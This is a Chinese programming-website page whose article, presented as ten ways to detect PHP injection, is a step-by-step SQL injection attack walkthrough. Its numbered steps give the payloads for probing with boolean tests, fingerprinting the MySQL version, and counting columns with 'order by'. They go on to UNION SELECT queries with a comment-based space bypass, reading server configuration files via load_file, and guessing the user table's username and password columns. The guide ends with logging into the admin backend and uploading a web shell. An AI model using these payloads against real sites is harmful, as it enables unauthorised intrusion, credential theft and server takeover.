程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
設為首頁 加入收藏
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> 網頁編程 >> PHP編程 >> 關於PHP編程 >> php判斷注入的10個方法介紹

php判斷注入的10個方法介紹

編輯:關於PHP編程

1.判斷是否存在注入,加;and 1=1;and 1=2

2.判斷版本 and ord(mid(version(),1,1))>51 /* 返回正常說明是4.0以上版本,可以用union  查詢

3.利用order by 暴字段,在網址後加 order by 10 /* 如果返回正常說明字段大於10

4.再利用union  來查詢准確字段,如: and 1=2 union   select 1,2,3,......./*直到返回正常,說明猜到准確字段數。如過濾了空格可以用/**/代替。

5.判斷數據庫連接帳號有沒有寫權限,and (select count(*) from mysql.user)>0 /*如果結果返回錯誤,那我們只能猜解管理員帳號和密碼了。

6. 如果返回正常,則可以通過and 1=2 union   select 1,2,3,4,5,6,load_file   (char(文件路徑的ascii值,用逗號隔開)),8,9,10 /* 注:load_file   
(char(文件路徑的ascii值,用逗號隔開))也可以用十六進制,通過這種方式讀取配置文件,找到數據庫連接等。

7.首先猜解user表,如: and 1=2 union   select 1,2,3,4,5,6.... from user /* 如果返回正常,說明存在這個表。

8.知道了表就猜解字段,and 1=2 union   select 1,username,3,4,5,6.... from user/*如果在2字段顯示出字段內容則存在些字段。

9.同理再猜解password字段,猜解成功再找後台登錄。

10.登錄後台,上傳shell

  1. 上一頁:
  2. 下一頁:
關於PHP編程
微信推送模板消息的PHP代碼整理

微信推送模板消息的PHP代碼整理 最近做過一個需要推送消息的
winbinder開發php桌面程序

趁著今天有空,給大家說說winbinder吧,今天講一下wi
2014年最新推薦的10款 PHP 開發框架,2014年10款

2014年最新推薦的10款 PHP 開發框架,2014年10
如何為Vista/Win2008中的IIS7添加PHP支持

目前很多網站采用PHP編寫,但是,其服務器環境可不一定是Fr
php折線圖 布局圖

1 標准的chart顯示

首頁四格,首頁五格For6.0(GBK)(UTF-8)[12種組合][9-18][版主安裝測試通過]

下載萬次的首頁四格,首頁五格For6.0(GBK)(UTF
相關文章
閱讀排行榜
php獲取post中的json數據的實現方法 PHP圖像處理模塊 magickwand PHP依賴倒置(Dependency Injection)代碼實例,依賴倒置原則 ReferencesandAliasesareDifferentMechanismszkarakaya CakePHP: tips on ssl, mysql load balance, mas 小案例:微型博客,案例:微型博客 php socket通信機制實例說明與代碼 關於APACHE的配置文件httpd.conf[轉](三) 用PHP寫的一個冒泡排序法的函數簡單實例,php冒泡排序函數 ECSHOP在PHP5.5及高版本上報錯的解決方法,ecshopphp5.5 記一次nginx部署yii2項目時502 bad gatewary錯誤的排查,nginxyii2
熱門圖文
簡介PHP遞歸算法和應用 asp.net treeview checkbox 相關問題 HOJ 3130 Qie-Gao -----------BFS hdu 4873 ZCC Loves Intersection(大數+概率) PHP:session無法使用 輸出-scanf_s結果不正確,請問是什麼問題? windows計算器java程序 電腦通過連接手機上網-怎麼用手機WIFI讓電腦上網
欄目導航
PHP基礎知識PHP綜合PHP入門知識關於PHP編程
Copyright © 程式師世界 All Rights Reserved